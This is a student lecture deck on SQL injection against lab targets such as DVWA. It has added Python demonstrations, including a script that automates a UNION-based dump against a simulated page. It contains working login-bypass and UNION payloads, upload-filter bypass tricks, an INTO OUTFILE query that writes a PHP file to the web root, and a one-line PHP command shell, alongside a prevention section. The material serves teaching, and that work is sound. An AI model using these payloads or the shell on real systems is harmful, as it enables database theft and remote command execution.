~ Aditya Kamat
BMS College of Engineering
WEB HACKING SERIES PART-3
TOPICS LEARNT TILL NOW:-
• Basics of web and a little about networks.
• HTML injection.
• SQL injection to bypass authentication.
• Buffer overflow attack.
CONT…
• Bypass Authentication Via Authentication Token
Manipulation.
• Session hijacking.
• Brute forcing login pages using burp.
• HTTP parameter pollution.
WHAT WILL BE COVERED TODAY:-
• SQL injection (Sqli).
• Uploading a shell and gaining remote code
execution capabilities on the server.
• And the prevention of course.
WHAT IS SQL??
• Structured Query Language (SQL) is the language used to
interact with a relational database.
• We ask questions in the form of queries, and the answers
are the result sets.
• Its syntax is simple and reads much like English.
BASIC OPERATIONS ON A DATABASE:-
• Create: Insert data into a database.
• Read: Read data from a table in a database.
• Update: Update some information present in a
database.
• Delete: Delete information from a database.
IMPORTANT SQL COMMANDS:-
(table of commands shown on the slide; source: w3schools.org)
LET’S HAVE A LOOK AT AN EXAMPLE QUERY:-
• select * from colleges;
• Assuming a table named "colleges" exists, the result is
every row of the table.
• A constraint is added with the keyword 'where'.
Example: select * from colleges where name='bmsce';
This returns only the rows whose name column equals 'bmsce'.
STEPS FOR INJECTION:-
• Search for a vulnerable point (injection point): a parameter
whose value ends up inside a query.
• Identify the database in use (MySQL here); payload syntax and
the schema tables differ between engines.
• Inject queries to dump the required data.
WHAT SHOULD WE FOCUS ON?
• Typical query a website runs to check a username and password:
select username,password from users where
username='x' and password='y';
• If the query returns one or more rows, the application treats
the user as authenticated.
• To become an authenticated user without knowing a password, we
inject ' or 1=1-- into the password field.
• The ' closes the password string, or 1=1 is always true, and
-- comments out the rest of the query. Because AND binds tighter
than OR, the condition becomes (username='x' and password='')
or 1=1, which matches every row, so the query returns rows and
the application logs us in (usually as the first user in the
table, often the admin). In MySQL the -- comment needs a
trailing space, so the payload is typed as ' or 1=1-- followed
by a space, or as ' or 1=1#.
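The bypass above, as an added example that is not part of the deck: the deck's login query assembled by string concatenation next to the same query with placeholders, run against a constructed in-memory users table. SQLite stands in for MySQL here (one difference: SQLite accepts -- without a trailing space, MySQL does not); the table contents and function names are this example's own.

```python
import sqlite3

# Constructed users table standing in for the target's database (assumption, not the deck's data).
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret');
INSERT INTO users VALUES ('alice', 'hunter2');
""")

# The payload from the deck. In MySQL write it as "' or 1=1-- " (trailing space) or "' or 1=1#".
BYPASS = "' or 1=1--"


def build_query(username, password):
    """The deck's query, assembled the vulnerable way: user input is pasted into the SQL text."""
    return (f"select username,password from users "
            f"where username='{username}' and password='{password}'")


def login_vulnerable(username, password):
    """Usernames the vulnerable query matches. With BYPASS as the password the WHERE clause
    becomes  username='x' and password='' or 1=1  which, because AND binds tighter than OR,
    is true for every row; the trailing -- comments out the closing quote."""
    return sorted(row[0] for row in _db.execute(build_query(username, password)))


def login_safe(username, password):
    """The prepared-statement fix: the SQL text is fixed and the values travel separately,
    so a quote inside the password is compared as data, never parsed as syntax."""
    query = "select username,password from users where username=? and password=?"
    return sorted(row[0] for row in _db.execute(query, (username, password)))
```

login_vulnerable("x", BYPASS) returns every user, which is why the application ends up logged in as the first row; login_safe("x", BYPASS) returns nothing, because the whole payload is compared against the password column as a literal string.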
LET’S START OFF WITH A
DEMO!
EXAMPLE 1--
STEP 1:
• Check if the site is vulnerable by adding a single quote at
the end of the parameter value. A database error (or a page
that changes) means the quote reached the query.
• http://192.168.56.100/cat.php?id=1'
STEP 2:
• Find the number of columns in the SELECT behind the page.
ORDER BY n sorts by the n-th selected column and fails once n is
larger than the column count.
• http://192.168.56.100/cat.php?id=1 order by 1
• http://192.168.56.100/cat.php?id=1 order by 2
• http://192.168.56.100/cat.php?id=1 order by 3
• http://192.168.56.100/cat.php?id=1 order by 4
• http://192.168.56.100/cat.php?id=1 order by 5 (we get an error
here, so the query selects 4 columns).
STEP 3:
• Find the columns whose content is displayed on the page; those
are the ones we can read data through.
• http://192.168.56.100/cat.php?id=-1 union select 1,2,3,4
• UNION combines the results of several SELECTs into one result
set (and removes duplicate rows); both SELECTs must have the
same number of columns, which is why step 2 came first.
• id=-1 matches no real row, so the page renders only our UNION
row: the numbers that show up on the page are the column
positions we can read through.
STEP 4 (NOT NECESSARY):
• http://192.168.56.100/cat.php?id=-1 union select 1,@@version,3,4
• @@version returns a string that indicates the MySQL server
version (information_schema, used next, exists from 5.0 on).
• database() returns the default (current) database name.
• user() returns the user name and host name the application
connected with; that account's privileges decide what else is
possible (the FILE privilege, for instance, is what INTO OUTFILE
in example 2 needs).
STEP 5:
• http://192.168.56.100/cat.php?id=-1 union select
1,table_name,3,4 from information_schema.tables
• We retrieve the names of all tables the database account can
see. information_schema.tables lists every table in every
schema; add where table_schema=database() to keep only the
application's own tables, and use group_concat(table_name) if
the page shows just one row.
STEP 6:
• http://192.168.56.100/cat.php?id=-1 union select
1,column_name,3,4 from information_schema.columns where
table_name='users'
• From the previous output we pick the interesting table and list
its columns with this query. Here we have chosen the table
'users'.
STEP 7:
• http://192.168.56.100/cat.php?id=-1 union select
1,concat(id,0x3a,login,0x3a,password),3,4 from users
• We dump the users table, naming the columns found in step 6.
concat() packs several columns into the single reflected
column.
• 0x3a is the hex equivalent of ':' ; it separates the values
of each column in the output. Writing it as hex keeps a quoted
string out of the payload.
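Steps 1 to 7 as one script, added here as an example and not the deck's or the lab's code: a stand-in for cat.php is run against a constructed in-memory SQLite database, and the attacker-side functions automate the column count, the reflected-column search, the schema enumeration and the dump of the users table. SQLite's catalog is sqlite_master and pragma_table_info() where MySQL has information_schema.tables and .columns, and || where MySQL has concat(); the stand-in page rendering only two of its four columns is an assumption modelled on the deck's output, and the table contents are constructed.

```python
import hashlib
import sqlite3

ADMIN_HASH = hashlib.md5(b"P4ssw0rd").hexdigest()  # unsalted md5, as the lab stores it

# Constructed stand-in for the target's database (assumption: not the lab VM's real schema).
_db = sqlite3.connect(":memory:")
_db.executescript(f"""
CREATE TABLE categories (id INTEGER, name TEXT, description TEXT, sortorder INTEGER);
INSERT INTO categories VALUES (1, 'Ruby', 'Ruby on Rails pictures', 10);
INSERT INTO categories VALUES (2, 'Python', 'Python pictures', 20);
CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '{ADMIN_HASH}');
""")


def cat_page(id_param):
    """Stand-in for the vulnerable cat.php: id goes into the SQL unquoted (hence the unquoted
    payloads in the deck), and only name and description, the 2nd and 3rd selected columns,
    are rendered. A SQL error is visible to the attacker, as in the deck's step 1."""
    query = f"SELECT id, name, description, sortorder FROM categories WHERE id={id_param}"
    try:
        rows = _db.execute(query).fetchall()
    except sqlite3.Error as err:
        return {"error": str(err)}
    return {"rows": [(str(row[1]), str(row[2])) for row in rows]}


def is_injectable():
    """Step 1: a stray quote breaks the SQL syntax and the page reports an error."""
    return "error" in cat_page("1'")


def find_column_count(max_cols=20):
    """Step 2: ORDER BY n sorts by the n-th selected column and errors once n exceeds the
    column count, so the last n that works is the number of columns."""
    for n in range(1, max_cols + 1):
        if "error" in cat_page(f"1 ORDER BY {n}"):
            return n - 1
    return None


def find_reflected_columns(ncols):
    """Step 3: id=-1 matches nothing, so only the UNION row is rendered. The marker numbers
    that appear on the page are the columns whose content the attacker can read."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    positions = {}
    for row in cat_page(f"-1 UNION SELECT {markers}").get("rows", []):
        for pos, cell in enumerate(row):
            if cell.isdigit():
                positions[int(cell)] = pos  # column number -> where the page renders it
    return positions


def extract(expr, from_clause, ncols, column, position):
    """Shared primitive for steps 4-7: put an expression into a reflected column of the UNION
    row (NULL elsewhere, which also avoids UNION type clashes) and read it back from the page."""
    cells = ["NULL"] * ncols
    cells[column - 1] = expr
    page = cat_page(f"-1 UNION SELECT {','.join(cells)} {from_clause}")
    return [row[position] for row in page.get("rows", [])]


def run_attack():
    """Steps 1-7 end to end; returns what each step found."""
    ncols = find_column_count()
    reflected = find_reflected_columns(ncols)
    column, position = next(iter(reflected.items()))
    # Step 5 (MySQL: table_name FROM information_schema.tables WHERE table_schema=database()).
    tables = extract("name", "FROM sqlite_master WHERE type='table'", ncols, column, position)
    # Step 6 (MySQL: column_name FROM information_schema.columns WHERE table_name='users').
    columns = extract("name", "FROM pragma_table_info('users')", ncols, column, position)
    # Step 7 (MySQL: concat(id,0x3a,login,0x3a,password) FROM users).
    users = extract("id || ':' || login || ':' || password", "FROM users", ncols, column, position)
    return {"injectable": is_injectable(), "columns_in_query": ncols, "reflected": reflected,
            "tables": tables, "users_columns": columns, "users": users}
```

run_attack() reports 4 columns, columns 2 and 3 reflected, the tables categories and users, the users columns id, login and password, and finally the row 1:admin:<md5>, the same sequence the deck walks through by hand.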
WHAT NEXT??
• We need the admin's clear-text password to log in.
• The dumped password is an unsalted md5 hash. A hash cannot be
decoded, but the md5 of a common password is found instantly in
the precomputed tables behind the "online md5 decoder"
services; in this lab it resolves to 'P4ssw0rd'.
• Upload a shell and gain access to the web server.
UPLOADING A SHELL:
• After gaining admin access, look for a page that allows
uploading images/documents (/admin/new.php in our case).
• Upload our simple php script so that system commands can be
passed in the URL.
• Some sites refuse a .php file. Try one of these extensions:
"Php, php3, pHp, phP, php.test". They work when the check is a
case-sensitive match on ".php" while the web server still hands
anything with .php or .php3 among its extensions to the PHP
interpreter.
• If none of these work, intercept the request (Tamper Data, or
Burp's proxy) and change the extension after any client-side
check has run.
• Last resort: embed the php script in an image's metadata with
exiftool and upload the image. Content checks pass it as an
image, but it only executes if the server later runs or
includes it as PHP.
EXAMPLE 2
(DVWA)
LET US TRY OUT THE SAME STEPS
HERE TOO!
• Try out steps 1 to 7 from the previous example; the injection
point is the id parameter of vulnerabilities/sqli/, and the
query behind it selects two columns.
NEW WAY TO UPLOAD A SHELL:-
• With "INTO OUTFILE", a SELECT result is written to a file on
the database server; if the web root is on the same machine,
that file can be a PHP page.
• Simple query we will use (DVWA's query has 2 columns, hence
the ",2"; --+ becomes "-- " once the URL is decoded; the # is
only the fragment of DVWA's form URL and is not sent):
http://192.168.56.100/hacks/DVWA-master/vulnerabilities/sqli/?id=' union select unhex(hex("hi")),2 INTO OUTFILE "C:/xampp/htdocs/hacks/DVWA-master/text.php"--+&Submit=Submit#
• This needs the application's database account to hold the FILE
privilege, secure_file_priv not to restrict the location, a
path the MySQL process can write to, and a file name that does
not exist yet (INTO OUTFILE never overwrites). Backslashes in a
Windows path must be doubled inside a MySQL string, or forward
slashes used as above.
CONTD…
• In the same way we write the php code from the previous
example into the file, so that system commands can be executed.
If the application escapes quotes, pass the script as a 0x...
hex literal instead of a quoted string.
<?php
system($_GET['cmd']);
?>
DONE!!!
SRC:null-byte.wonderhowto.com
PREVENTION:-
• Validate all user-supplied input (type, length, allowed
characters) as a second layer, never as the only one.
• Use prepared statements (parameterised queries) for every
query that takes user input; this is the fix that removes the
injection, because the input is never parsed as SQL.
• Review code for all possible injection points, including
ORDER BY clauses and table names, which placeholders cannot
cover.
• Store passwords as salted, slow hashes (bcrypt, Argon2,
PBKDF2), never as plain md5: the demo's password was recovered
instantly from an unsalted md5.
Ref: https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet
CONT…
• Use a web application firewall as an extra layer; it filters
known payloads but does not fix the code.
• Run the RIPS static analyser on the PHP code to find unescaped
input reaching queries.
• Give the database account the application uses only the
privileges it needs: no FILE privilege (that is what made INTO
OUTFILE work), no access to other schemas, and no superuser.
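The salt+hash point, as an added example that is not the deck's code: the unsalted md5 the demo dumped next to a salted, deliberately slow hash built from the standard library's PBKDF2 (bcrypt or Argon2 are the usual production choices), plus the lookup that an "online md5 decoder" actually performs. The function names, the storage format and the wordlist are this example's own.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # OWASP's current guidance for PBKDF2-HMAC-SHA256


def md5_store(password):
    """What the demo's target did: unsalted md5. Same password, same hash, for every user."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_attack(stored_hashes, wordlist):
    """What an 'md5 decoder' site is: a precomputed table. Nothing is decoded; the hash of each
    candidate is computed once and compared, and unsalted hashes of common passwords match."""
    table = {md5_store(word): word for word in wordlist}
    return {h: table[h] for h in stored_hashes if h in table}


def salted_store(password, salt=None):
    """Salted, slow hash. Stored as pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>, so the
    parameters travel with the hash and can be raised later without breaking old records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def salted_verify(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Two users with the password P4ssw0rd share one md5, which a wordlist lookup resolves at once; two salted_store() calls for the same password give different strings, neither appears in any precomputed table, and each verify costs the attacker 600,000 HMAC computations per guess.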
ADDITIONAL RESOURCES:-
• Try out more php shells at: r57shell.net
• SQL injection tutorials at:
https://www.youtube.com/watch?v=_Y8A-1GAUiY&list=PLMA3sO-IlLtuREVEaRX0s8d2WeUM0E4bE
http://www.sqlinjection.net/
• Practice at: hackthissite.org
• Practice VM: https://pentesterlab.com/exercises/from_sqli_to_shell/iso
• DVWA: http://www.dvwa.co.uk/
THANK YOU
